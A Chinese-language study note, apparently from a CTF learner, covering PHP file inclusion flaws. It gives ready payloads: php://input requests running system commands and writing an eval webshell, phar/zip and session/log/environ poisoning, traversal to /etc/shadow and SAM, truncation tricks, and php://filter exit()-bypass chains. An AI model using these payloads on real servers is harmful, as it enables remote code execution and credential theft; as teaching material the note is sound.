FL漏洞知识点总结

1.include/require/include_one/require_one

在PHP语法篇的10.文件里面我们讲了include和require和include_one和require_one这些，如果大家忘记了，可以返回去看看。

2.allow_url_include/allow_url_fopen

其实我看到老师写的书上也还在说这个，但是我看官方手册上面allow_url_include自php7.4就废除了，还发现就算是再新的书都有一定的滞后性，大家还是以手册为主。虽然废除了，但是我们还是讲解这两个在php.ini配置文件中的作用

1）allow_url_include

这个选项允许include,require,include_one和require四个函数的使用。

2）allow_url_fopen

本选项激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象例如文件。默认的封装协议提供用 ftp 和 http 协议来访问。

3.php伪协议

我们在RCE漏洞知识点总结的5.php伪协议里面讲了php伪协议，忘记了也可以去看看

1.php://filter              主要用于读取源码
2.php://input               经常使用file_get_contents获取php://input内容
3.data://                   执行命令
4.file://                   访问本地文件系统

在有以上的知识的基础上我们要介绍这个FL漏洞了。主要是分为本地文件包含漏洞和远程文件包含漏洞。

1.本地文件包含漏洞

本地文件包含漏洞是指能打开并且包含本地文件的漏洞，大部分都是这个漏洞。不受allow_url_fopen和allow_url_include的影响

2.远程文件包含漏洞

远程文件包含漏洞是指能够包含远程的文件并且执行他们，这个远程是我们可控的，所以危害较大，并且要求allow_url_fopen和allow_url_include都打开为on才能够执行。

3.敏感文件的目录

这里主要是要进行目录穿越或者是遍历任意文件时用到，虽然有很多，但是也不知道有用没用，都积累一下吧。

linux下：

/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

windows下

c:\boot.ini // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

c:\windows\repair\sam // 存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my.ini // MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

c:\windows\php.ini // php 配置信息

4.php伪协议

在开头我们也放了php伪协议，虽然有相同的运用之处，但是也有一些差别，我们会专门就这个漏洞再来补充他们在这个漏洞的用法。有些不怎么要用或者之前已经详细讲过的就直接跳过去了。

1)file://

访问本地文件系统。

条件：无要求

姿势：

http://*********.php/?file=file://C:/Windows/win.ini

2）php://input

可以直接读取到POST上没有经过解析的原始数据。我们之前提到过，input后面可以加上post的body执行php代码。

条件：

• allow_url_include=On

姿势：

①执行代码

http://*******.php/?file=php://input
/*[post]
<?php phpinfo()?>*/

后面的注释的php代码需要通过post传递。

②执行命令

http://******.php/?file=php://input
/*[post]
<?php system('ls');?>*/

③写入木马

http://******.php/?file=php://input
/*[post]
<?php fputs(fopen('hack.php','w'),'<?php @eval($_POST['123456'])?>');?>*/

解释一下上面的php语句吧。可能因为之前没有见到过可能不太理解。这里了解两个函数之后就容易理解了，就是后面的木马代码是写入到前面fopen打开的文件里面的。

fputs（）/fwrite()：写入文件

并且是把data写入到scream里面。

复制

fwrite(resource $stream, string $data, ?int $length = null): int|false

fopen():打开文件或者url。

filename可以是文件，可以是url。

复制

fopen(string $filename, string $mode,bool $use_include_path = false,?resource $context = null
): resource|false

并且模式和c语言打开文件一样这里贴张图大家看吧

3）php://filter

这个之前就讲的详细了，没啥好补充的。

4）phar://

这个之前没讲过，但是在这里要用到，补充一下。

是php解压缩包的协议，并且不管后面是什么都会解压缩，无差别平等攻击

要求：

• phpversion>=5.3

姿势：

①执行代码：

写一个php代码比如<?php echo"hellp";?>，然后打包成zip压缩模式的压缩包

然后指定绝对目录

http://localhost:3000/study.php?file=phar://F:\php%20code\1.zip\1.php

当然相对目录也可以

http://localhost:3000/study.php?file=phar://1.zip/1.php

②执行命令:

只要把php代码修改一下变成执行命令的语句就可以，其他都不变，这里就不测试了因为步骤都是一样的

③写入木马：

同理

5)zip://

和上面的phar（）的作用是一样的，就是用法不一样。我们直接说区别了其他都是一样的。他们的区别主要是在路径上。

并且压缩文件包和压缩文件之间要用#连接，并且这个#得经过url编码，也就是%23。

http://localhost:3000/study.php?file=phar://F:\php%20code\1.zip%231.php

6）data://

就是之前的两句话之前已经很详细地说了。

5.包含session

首先我们先介绍一下session是什么

session简单理解就是会话。打个生动的比喻，session是位于服务器端的保险柜。比如我们去健身的时候，前台小姐姐会给我们一把钥匙和与它对应的保险柜，我们从开始健身到最后离开健身房就是一个会话，途中可能会去买瓶水放到保险柜里，或者从保险柜里拿个换洗衣物之类的，都是这个中间产生的数据，保险柜记录了我们产生的数据。

条件：

如果要使用包含session，那么我们需要知道session的路径并且他的内容部分是我们可控的。

姿势：

我们可以查看phpinfo()文件里面的session的路径存放处，在session下面的session_save_path

1）常见php的session存放位置

/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

我的session就位于/var/lib/php/sessions下。

2）命名

sessions目录下的文件的命名是sess_[phpsessid]。而phpsessid是我们的cookie里面可以看到的，我们甚至可以控制cookie中的phpsessid的值。然后发送的时候，产生的session文件的命名就是我们的命名规则中的结果。

比如我们首先执行一个php代码

<?php
session_start();
echo "hell0";
?>

我们可以通过editthecookie插件看到phpsessid是is4978nk7n9nuajv21qe688svg

然后从前面我们就知道我们的session文件存在/var/lib/php/sessions下面，然后我们进行查看出现了一个新的sess_xxxxx文件，这个文件就是产生的session文件。

3）利用

接下来我们将要讲如何利用包含session，其实session的利用并不是固定化的，我们要通过进入session文件，然后通过观察session文件中的可控变量，然后写入payload。

我们接下来通过自己实验的一个例子理解这个观察可控变量。

首先搭建这个php代码环境

<?php
session_start();
error_reporting(0);

if (isset($_POST['username'])) {
    $_SESSION['username'] = $_POST['username'];
}


if (isset($_GET['file'])) {
    include($_GET['file']);
}

?>

对于这段代码我们首先介绍$_SESSION,这个之前没有见到过,我直接把那个文章的那句话复制下来，因为他已经解释的比手册好很多了。

1. PHP 会将会话中的数据设置到 $_SESSION 变量中。

2. 当 PHP 停止的时候，它会自动读取 $_SESSION 中的内容，并将其进行序列化，然后发送给会话保存管理器来进行保存。

3. 对于文件会话保存管理器，会将会话数据保存到配置项 session.save_path 所指定的位置。

上述代码中的$username是可控的，并且能被写入到session中。所以我们对session写入一句话木马或者其他执行代码的语句。然后我们使用username去访问sessions下面的文件，就是去包含这个文件。

6.包含日志

因为web服务器很多时候都会将请求写入到日志文件中，比如apache这种。

条件：

需要知道服务器日志的存储路径，且日志文件可读。

1）一些日志默认存储路径

1.apache+Linux日志默认路径：/etc/httpd/logs/access.log或/var/log/httpd/access.log

2.apache+win2003日志默认路径：D:\xampp\apache\logs\access.log、D:\xampp\apache\logs\error.log

3.IIS6.0+win2003默认日志文件：C:\WINDOWS\system32\Logfiles

4.IIS7.0+win2003 默认日志文件：%SystemDrive%\inetpub\logs\LogFiles

5.nginx 日志文件：日志文件在用户安装目录logs目录下,假设安装路径为/usr/local/nginx,那日志目录就是在/usr/local/nginx/logs下面
linux/var/log/nginx/access.log

除了路径，我们需要看一下日志文件长什么样子

上面就包含了我刚刚用burpsuite发送的请求。所以只要是请求发送了他都能记录下来。并且我们发现包含进去的其实是路径里面的内容，以及user-agent也能包含，所以我们的payload也是写在这个地方。

2）利用

从上述的日志中我们已经知道了我们把payload放置的地方，然后发送请求。但是这里会遇到一些情况。

①编码错误

有时候我们用burp发送的到日志中会乱码，我们就要把我们的语句用url进行编码才能执行成功。

②log位置被修改

就比如我的电脑上的位置就和我们上面写的常见的路径都不一样，这个时候我们可以通过修改配置文件再包含。

下面是一些默认的配置文件的路径（其实这些默认和我电脑完全不一样）

1.apache+linux 默认配置文件
        /etc/httpd/conf/httpd.conf或/etc/init.d/httpd

2. IIS6.0+win2003 配置文件
        C:/Windows/system32/inetsrv/metabase.xml

3. IIS7.0+WIN 配置文件
        C:\Windows\System32\inetsrv\config\applicationHost.config

7.包含environ

这里首先解释什么是environ

environ：

英文单词都学过environment（环境），这个environ其实就是环境变量。他的位置是默认的的

在linux下面是/proc/self/environ，在win下面没有

那篇文章里面写它包含了user-agent（http请求头里面的），虽然我在我的文件里面没有看到。

1）利用

所以在知道了use-agent是能知道位置的，那么我们就在user-agent里面写入php代码，然后去包含这个environ文件就可以执行我们的payload了。

8）包含fd

先解释fd吧

fd（file describe）：文件描述符

fd是一个子目录（就是下面还有文件），并且可以看到下面的文件名是数字。linux的目录我们都知道是树状的，找文件要一层一层的找下去，但是这样很费事件，所以为了提高效率，就有了fd，这个数字就相当一个索引，我们如果要查找某个进程，只要查找这个索引就可以了。0是标准输入，1是标准输出，2是标准错误。这意味着如果此时去打开一个新的文件，它的文件描述符会是3，再打开一个文件文件描述符就是4......

文件路径在/proc/self/fd下，但是怎么利用没看到说，就先这样吧。

9）包含上传文件

我们直接把木马做成他想要的形式就可以了。在后面的文件上传漏洞我们仔细讲。

10）条件竞争

本来以为可以不做这个，结果发现5道题全是竞争条件，被迫学习。首先对原理进行讲解，因为自己原理都理解了很久。session部分直接用手册上的来，附加自己的一些理解和注释，虽然没啥理解。

其实我理解的条件竞争，就是一直发包一直发包让他在清空前就写入，就是瞎猫碰上死耗子。

1)利用session进行条件竞争

ctfshow上面的都是这一个，利用session进行条件竞争。

我们首先要了解一些配置手册里面关于session上传的内容。

session.upload_progress.enabled:启用上传进度跟踪，填充$_SESSION变量。默认为 1，启用。

session.upload_progress.cleanup:读取所有 POST 数据（即上传完成）后，立即清除进度信息。默认为 1，启用。

session.upload_progress.prefix（前缀):用于$_SESSION 中上传进度键的前缀。该键将与 $_POST[ini_get("session.upload_progress.name")]的值连接起来以提供唯一索引。 默认为“upload_progress_”。

session.upload_progress.name:$_SESSION 中用于存储进度信息的键的名称。如果$_POST[ini_get("session.upload_progress.name")] 不通过或不可用，则不会记录上传进度。 默认为“PHP_SESSION_UPLOAD_PROGRESS”。

然后我们来了解session_upload_progress（会话上传进度）

当 启用session.upload_progress.enabled INI 选项时，PHP 将能够跟踪正在上传的单个文件的上传进度。此信息对于实际上传请求本身并不是特别有用，但在文件上传期间，应用程序可以向单独的端点（例如 通过XHR ）发送 POST 请求以检查状态。

当上传正在进行时，以及当 POST 与session.upload_progress.name INI 设置设置 为同名的变量时， 上传进度将在$_SESSION超全局 中可用。当 PHP 检测到此类 POST 请求时，它将在 $_SESSION中填充一个数组，其中索引是 session.upload_progress.prefix 和 session.upload_progress.name INI 选项的串联值。通常通过读取这些 INI 设置来检索密钥，即

复制

<?php
$key = ini_get("session.upload_progress.prefix") . $_POST[ini_get("session.upload_progress.name")];
var_dump($_SESSION[$key]);//ini_get()就是获取配置选项的值
?>

然后是手册给我们展示的两个代码，第一个是一个文件上传的html编写的表单

<form action="upload.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
 <input type="file" name="file1" />
 <input type="file" name="file2" />
 <input type="submit" />
</form>

这段代码的意思是第一行是交代了发送的位置是upload.php这个文件。第二行是隐藏了一个name，这个name是通过获取当前会话中文件上传进度的会话变量名来跟踪他的上传进度，后面是上传的两个文件file1,file2。

第二个是存储在session中的数据大致是这样。

<?php
$_SESSION["upload_progress_123"] = array(
 "start_time" => 1234567890,   // 请求开始时间
 "content_length" => 57343257, // POST 内容长度
 "bytes_processed" => 453489,  // 已接收并处理的字节数
 "done" => false,              // 当 POST 处理程序完成时为 true，无论成功与否
 "files" => array(
  0 => array(
   "field_name" => "file1",       // <input/> 字段的名称
   // 下面的 3 个元素与 $_FILES 中的相同
   "name" => "foo.avi",
   "tmp_name" => "/tmp/phpxxxxxx",
   "error" => 0,
   "done" => true,                // 当 POST 处理程序完成处理此文件时为 true
   "start_time" => 1234567890,    // 此文件开始处理的时间
   "bytes_processed" => 57343250, // 此文件已接收并处理的字节数
  ),
  // 另一个文件，在同一请求中尚未完成上传
  1 => array(
   "field_name" => "file2",
   "name" => "bar.avi",
   "tmp_name" => NULL,
   "error" => 0,
   "done" => false,
   "start_time" => 1234567899,
   "bytes_processed" => 54554,
  ),
 )
);

这些就是需要理解的一些基础原理，做题会在ctfshow里面先做题再总结方法，网上都是直接讲题目，方法其实感觉没有。总之就是用bp或者用python脚本来发包。等熟悉了再来总结了。

11）绕过

我算是发现了有防御就会有绕过。这里有很多绕过方法

（1）遇到前缀

<?php
    $file = $_GET['file'];
    include '/var/www/html/'.$file;
?>

像这种，我们自己输入的文件前面还带一些其他的路径的，我们可以通过路径遍历来绕过。../走到上一个目录，所以对上面的/var/www/html/.$file我们在我们平时需要输入的路径前加上../../../就变成了我们的$file。如果要达到/var,前面甚至只需要两个../

当然别人也可以对../进行过滤，我们就需要对他做一些变化。

①url编码

②二次编码

这个二次编码指的是url的二次编码，其实他就是对url编码了一次的字符串再做了一次url编码。一个url编码的形式是%xx,两次url编码的形式就是%xxxx，从后面的2位变成了4位，所以展现几个为

（2）遇到后缀

<?php
    $file = $_GET['file'];
    include $file.'/test/test.php';
?>

文章中提到了include有两种情况，一种是结果file是个路径，是个url，一个是file是个伪协议。我们也按照上面写的来。

①解决url

url拼接之后就是

http://**********/path/file.php/test/test.php

我们可以用query(?)和fragement()来绕过。

条件：

• allow_url_fopen()=on

• allow_url_include()=on

(1)query(?)

首先我们解释一下url中的query是什么

URL查询(Query)是指在URL(Uniform Resource Locator，统一资源定位符)中的问号（?）后面添加的键值对。我们的文件里面如果没有需要添加的键值对的话是就算后面有？也不起作用。

姿势：

在我们常写的file后面加一个？就是新的file里面应该有的

index.php?file=http://remoteaddr/remoteinfo.txt?

如果我们要写入木马或者命令的话，只要将remoteinfo.txt的内容变成一句话木马就行。

（2）fragment（#/%23）

首先我们解释一下什么是url里面的fragment

URL片段（URL fragment）是一个附加到URL的字符串，以#为前缀。它旨在帮助浏览器识别特定内容或部分页面，并不会发送到服务器，也不会影响页面的加载。

姿势：

在我们常写的file后面加一个#就是新的file里面应该有的

index.php?file=http://remoteaddr/remoteinfo.txt%23

②解决伪协议

这里主要用的是两个解压缩的两个zip://和phar://，用法在上面已经提过了。其实它的原理就是在我们知道了后缀的文件路径后，我们可以在我们本来需要zip文件下面去构造这个/test/test.zip这个文件。然后让他们去执行，这个test.zip里面就写上我们需要的执行代码或者木马。

（1）zip://

zip后面要用绝对路径，并且在zip后面需要用#隔开

fileinclude2.php?file=zip://D:\phpStudy\PHPTutorial\WWW\J0.zip%23J0

（2）phar://

phar后面也要用绝对路径，但是可以不用#隔开

其他方法

①长度截断

在我们需要的执行的代码后面加./././很多很多的./，在linux下超过4096字节，在win下超过256字节，就可以成功。相当于把后面的后缀给舍去了

姿势：

fileinclude2.php?file=phpinfo.php/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

②%00截断

%00截断原理：

截断的核心，就是 chr(0)这个字符。先说一下这个字符，这个字符不为空 (Null)，也不是空字符 ("")，更不是空格。 当程序在输出含有 chr(0)变量时 chr(0)后面的数据会被停止，换句话说，就是误把它当成结束符，后面的数据直接忽略，这就导致漏洞产生。

条件：

magic_quotes_gpc = Off（当On时，所有的'(单引号)，" (双引号)，/(反斜线)和NULL字符都会被自动加上一个反斜杠\进行转义。然后这时再用%00会变成\0，被转义了）

姿势：

index.php?file=phpinfo.php%00

（3）死亡绕过

纯属是做题目的时候出现了死亡绕过，就在这里写一下了，不然都不知道这是个啥。

需要绕过的目前看到的是exit()和die()这两个在和file_put_contents()。参考文章里面是exit()，但是其实做题的时候我做到的是die（），但是绕过方法都是一样的。

简单介绍一下他们吧。

1）函数介绍

die()/exit():die()等同于exit()

输出一个消息并且退出当前脚本

复制

exit(string $status = ?/int $status):void

file_put_contents我们之前就已经讲过了，就是将后面的data写入前面的文件的函数。

2）情况

这里有三种情况

file_put_contents($filename,"<?php exit();".$content);

file_put_contents($content,"<?php exit();".$content);

file_put_contents($filename,$content."\nxxxxxxx");

这个代码的执行过程我们接下来会说说。

①file_put_contents($filename,"<?php exit();".$content);

向指定的文件中写入一段 PHP 代码，并确保当这个文件被包含时，会立即退出执行，然后写入额外的内容 $content。所以就是我们能写入一句话但是不能执行。所以我们要如何绕过这个exit呢

方法有四种

一.base64解码

用base64是为了让<?php exit();这部分用base64解码，然后解码之后是乱码，php代码就不知道写的啥了。所以就实现了对exit的绕过。但是我们的关键语句用的base64解码后写入的，所以在读取时就是base64编码的读取结果。要用base64解码写入的话需要用php://filter这个

filename=php://filter/convert.base64-decode/resource=shell.php&content=aPD9waHAgcGhwaW5mbygpOz8+

上述就是网shell.php里面写入了<?php exit(); aPD9waHAgcGhwaW5mbygpOz8+,这个代码的解码片段，然后再执行里面的php代码。

后面的PD9waHAgcGhwaW5mbygpOz8+解码后是<?php phpinfo(); ?>是我们想写的执行语句。这个a的存在是为了让前面的phpexit解码并且不影响后面的我们要写的语句。（base64每四个一解码），phpexit是7个，加个a变成8个才不会影响后面的我们要写入的句子。

二.rot13编码绕过

先解释一下什么是rot13吧

ROT13 编码是把每一个字母在字母表中向前移动 13 个字母得到。

道理还是相同的，而且我们不用考虑添加一个a来凑到4的倍数之类的，只需要把rot13编码后的传入就可以了，顺便提醒一下，这个时候的过滤器的read变成了convert.string.rot13

filename=php://filter/convert.string.rot13/resource=shell.php&content=<?cuc cucvasb();?>

三.convert.iconv.*绕过

对于iconv字符编码转换进行绕过的手法，其实类似于上面所述的base64编码手段，都是先对原有字符串进行某种编码然后再解码，这个过程导致最初的限制exit去除，而我们的恶意代码正常解码存储。

这里介绍几种。

（1）ucs-2

对目标字符串进行2位一反转，也就是说，字符串的数目得是偶数。不然就会被截断。可以去这个里面去看看工具，很多很偏门的工具，虽然我没找到在线的，但是我让chatgpt生成了一个脚本。

https://onlinetexttools.com/convert-unicode-to-ucs2

def swap_pairs(text):
    # 对输入字符串中的每两个字符进行位置互换
    swapped_text = ""
    for i in range(0, len(text), 2):
        # 逐对提取字符并交换位置
        pair = text[i:i+2]
        swapped_pair = pair[1] + pair[0]  # 交换位置
        swapped_text += swapped_pair
    return swapped_text

def main():
    text = input("Enter the text to encode using UCS-2: ")
    if len(text) % 2 == 0:  # 检查字符串长度是否为偶数
        swapped_text = swap_pairs(text)
        print("UCS-2 encoded text:", swapped_text)
    else:
        print("Input string length must be even. Current character count:", len(text))

if __name__ == "__main__":
    main()

这个时候用到的过滤器是convert.iconv.UCS-2LE.UCS-2BE ,

姿势：

file=php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=shell.php&content=?<hp pe@av(l_$OPTSx[)]?;;>

(2)ucs-4

对目标字符串进行4位一反转，也就是说，字符串的数目得是4的倍数。不然就会被截断。脚本给上

def swap_quads(text):
    # 对输入字符串中的每四个字符进行位置翻转
    swapped_text = ""
    for i in range(0, len(text), 4):
        # 逐四个提取字符并翻转位置
        quad = text[i:i+4]
        swapped_quad = quad[::-1]  # 翻转位置
        swapped_text += swapped_quad
    return swapped_text

def main():
    text = input("Enter the text to encode using UCS-4: ")
    if len(text) % 4 == 0:  # 检查字符串长度是否为4的倍数
        swapped_text = swap_quads(text)
        print("UCS-4 encoded text:", swapped_text)
    else:
        print("Input string length must be a multiple of 4. Current character count:", len(text))

if __name__ == "__main__":
    main()

这个时候用到的过滤器是convert.iconv.UCS-4LE.UCS-4BE ,

原理是一样的，就不细写了。

四.过滤器嵌套

用了一个过滤器string.strip_tags

string.strip_tags可以过滤掉html标签和php标签里的内容

所以这个过滤思路就是首先让他把<?php exit();?>去除掉，然后再来base64进行解码，所以这个就要求我们先补充一个?>,并且要先把<?php exit();?>先去掉，而且后面我们的语句不能先解码。

filename=php://filter/string.strip_tags|convert.base64-decode/resource=shell.php&content=?>PD9waHAgcGhwaW5mbygpOz8+

五. .htaccess的预包含利用

这里先给大家看姿势再解释吧

filename=php://filter/write=string.strip_tags/resource=.htaccess&
content=?>php_value auto_prepend_file D:\\phpstudy_pro\\www\\flag.php

这里还是用的string.strip_tags去去除前面的exit，然后把后面的代码写入到.htaccess文件（apache配置文件）里面。后面的代码是一个配置，PHP 配置 auto_prepend_file，使得在执行所有 PHP 脚本之前，会先执行 D:\\phpstudy_pro\\www\\flag.php 这个文件。

②file_put_contents($content,"<?php exit();".$content);

这种情况下文件名和文件内容一致，但是我们需要前面的文件时php结尾，所以我们需要添加.php，并且需要利用filter这个还是一样的。所以我们写出来的姿势就变成了。

具体解释可以看，讲得很透彻了。

一.base64编码

content=php://filter/string.strip_rot13|convert.base64-decode/resource=?>PD9waHAgcGhwaW5mbygpOz8+/../shell.php

二.rot13编码

content=php://filter/string.strip_rot13|<?cuc cucvasb();?>|/resource=shell.php

content=php://filter/string.strip_rot13/resource=<?cuc cucvasb();?>/../shell.php

如果rot被过滤了，可以采用rot的二次编码

这里有一个rot二次编码的脚本。

<?php 
$char = 'r'; #构造r的二次编码 
for ($ascii1 = 0; $ascii1 < 256; $ascii1++) { 
    for ($ascii2 = 0; $ascii2 < 256; $ascii2++) { 
        $aaa = '%'.$ascii1.'%'.$ascii2; 
        if(urldecode(urldecode($aaa)) == $char){ 
            echo $char.': '.$aaa; 
            echo "\n"; 
        } 
    } 
} 
?> 

三.convert.iconv.*过滤

直接写过滤姿势了，因为原理前面讲过了。这里写的ucs-2，其实4也可以。

file=php://filter/convert.iconv.UCS-2LE.UCS-2BE|?<hp pe@av(l_$OPTSx[)]?;;>/resource=shell.php

③file_put_contents($filename,$content."\nxxxxxxx");

没有结束，直接输入就行了。

filename=shell.php&content=<?php phpinfo();?>

参考门：

欢迎大家给我留言，🤭